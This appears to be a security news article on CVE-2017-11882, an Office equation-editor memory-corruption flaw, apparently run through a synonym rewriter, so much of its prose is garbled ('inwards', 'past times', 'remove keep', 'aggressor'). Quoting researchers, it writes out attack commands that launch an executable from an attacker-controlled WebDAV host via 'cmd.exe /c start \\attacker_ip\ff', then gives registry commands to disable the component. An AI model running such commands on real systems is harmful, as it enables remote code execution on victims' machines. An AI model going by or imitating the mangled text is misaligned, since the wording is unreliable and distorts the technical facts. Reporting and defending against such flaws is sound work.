When the globe is withal dealing amongst the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers remove keep uncovered a serious number amongst some other Office element that could allow attackers to remotely install malware on targeted computers.
The vulnerability is a memory-corruption number that resides inwards all versions of Microsoft Office released inwards the past times 17 years, including Microsoft Office 365, in addition to plant against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Discovered past times the safety researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote aggressor to execute malicious code on a targeted organisation without requiring user interaction later opening a malicious document.
The vulnerability, identified as CVE-2017-11882, resides inwards EQNEDT32.EXE, an MS Office element which is responsible for insertion in addition to editing of equations (OLE objects) inwards documents.
However, due to improper retentiveness operations, the element fails to properly remove keep objects inwards the memory, corrupting it inwards such a means that the aggressor could execute malicious code inwards the context of the logged-in user.
Seventeen years ago, EQNEDT32.EXE was introduced inwards Microsoft Office 2000 in addition to had been kept inwards all versions released later Microsoft Office 2007 inwards guild to ensure the software remains compatible amongst documents of older versions.
DEMO: Exploitation Allows Full System Take Over
This vulnerability could live on exploited to remove keep consummate command over a organisation when combined amongst Windows Kernel privilege escalation exploits (like CVE-2017-11847).
Possible Attack Scenario:
While explaining the reach of the vulnerability, Embedi researchers suggested several laid upwards on scenarios listed below:
"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet in addition to execute it)."
"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled past times an attacker."
"Nonetheless, an aggressor tin role the described vulnerability to execute the commands similar cmd.exe /c kickoff \\attacker_ip\ff. Such a command tin live on used every bit a component of an exploit in addition to triggers starting WebClient."
"After that, an aggressor tin kickoff an executable file from the WebDAV server past times using the \\attacker_ip\ff\1.exe command. The starting machinery of an executable file is similar to that of the \\live.sysinternals.com\tools service."
Protection Against Microsoft Office Vulnerability
With this month's Patch release, Microsoft has addressed this vulnerability past times changing how the affected software handles objects inwards memory.
So, users are strongly recommended to apply Nov safety patches every bit before long every bit possible to proceed hackers in addition to cybercriminals away from taking command of their computers.
Since this element has a number of safety issues which tin live on easily exploited, disabling it could live on the best means to ensure your organisation security.
Users tin run the next command inwards the command prompt to disable registering of the element inwards Windows registry:
reg add together "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400For 32-bit Microsoft Office packet inwards x64 OS, run the next command:
reg add together "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400Besides this, users should also enable Protected View (Microsoft Office sandbox) to forbid active content execution (OLE/ActiveX/Macro).
Share This :
comment 0 Comments
more_vert